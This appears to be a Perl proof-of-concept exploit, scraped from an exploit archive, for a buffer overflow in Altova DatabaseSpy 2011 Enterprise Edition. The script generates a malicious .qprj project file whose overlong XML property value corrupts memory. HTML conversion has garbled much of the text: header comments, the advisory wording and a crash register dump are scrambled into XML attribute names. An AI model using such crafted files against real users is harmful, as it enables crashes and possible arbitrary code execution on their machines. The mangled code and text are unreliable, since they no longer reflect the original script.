Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability

<html><body><p>#!/usr/bin/perl
#
#
# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
#
#
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
#
#
# Summary: Altova DatabaseSpy� 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
#
#
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundry checking of some XML tag
# property values, ex: <folder access="" advisory="" affected="" aid="" altova="" an="" and="" any="" arbitrary="" are="" attacker="" ax="" be="" before="" by:="" bytes="" c0000005="" can="" chance="" cls="" cmp="" code="" com="" computer-based="" concept="" contact="" context="" copyleft="" could="" crafting="" cs="001b" databasespy="" databasespy.exe="" defaulted="" discovered="" discovered.="" ds="0023" ds:0023:56413f2e="????" eax="04430041" ebp="00000017" ebx="0203ff98" ecx="0443deda" edi="00000016" edition="" edx="56413f2e" efl="00010202" ei="" eip="00420b83" encoding='\"UTF-8\"?' engineering.="" error:="" es="0023" esi="0022dd98" esp="0022dc00" exception="" exceptions="" execute="" expected="" export="" file="" files.="" first="" foldername="SQL" for="" found.="" from="" fs="003b" gjoko="" gmail="" gs="0000" handled.="" handling.="" header="" http:="" id:="" in="" initial="" iopl="0" krstic="" lab="" liquidworm="" machine="" may="" microsoft="" my="" na="" nc="" no="" node="" not="" nv="" nz="" of="" on:="" or="" perl="" pl="" po="" poc="" print="" professional="" project="" proof="" ptr="" public="" released.="" remotely="" reply="" reported="" science="" script="" sent="" social="" sp3="" ss="0023" status:="" strict="" sub="" symbol="" symbols="" system="" tested="" the="" this="" to="" txt:="" type="AAAAAAA..../&gt;" up="" url:="" use="" vendor="" vendor.="" version='\"1.0\"' via="" violation="" vulnerability="" windows="" with="" xp="" zero="" zsl-2010-4971="">\xA&lt;!-".
	      "-  DatabaseSpy Project File  --&gt;\xA<project expanded='\"Yes\"' title=".
	      " type='\"Root\"' vers="">\xA\x9<folder foldername='\"Data' sources="" type='\"DataSourceFolder\"/'>\xA\x9<folder and="" blockingstrategy='\"semi\"/' database="" datasource='\"Offline\"' descrip="" files="" fol="" for="" organize="" pro="" sql="" this="" type='\"SQLRootFolder\"'>\xA\x9<folder corningstone.="" databas="" datasource='\"Offline\"' descri="" foldername='\"Design\"' love="" type='\"$PAYLOAD\"' veronica=""></folder>\xA\x9&lt;".
	      "Folder FolderName=\"Data Diff\" Type=\"DataDiffR".
	      "ootFolder\"/&gt;\xA\x9<folder d="" diffrootfolder="" foldername='\"Schema' type='\"Schema'></folder>\xA\x9<fol foldername='\"Favorites\"' type='\"FavoriteFold".'></fol>\xA</folder></folder></project>\xA";

sub code()
{
	      system ("color 3"); #~!@#$%^&amp;*()_+|&lt;&gt;?:"{}=-`';/.,0
	      open qprj, "&gt;./$FILENAME" || die "\nCan't open #$_@ 
	      $FILENAME: $!"; print "\n (1) "; system("pause"); #
	      print qprj $PROJECT; print "\n (2) Buffering mali".
	      "cious format file . . .\r\n"; sleep 2; close qprj;
	      print "\n (3) File $FILENAME created successfully".
	      "!\n"; sleep 2; system ("color \x44"); sleep 1; #.%
	      print "\n (4) And the color is changed.\n";
}

print "\n";
header();
code();

#EOF
</folder></p></body></html>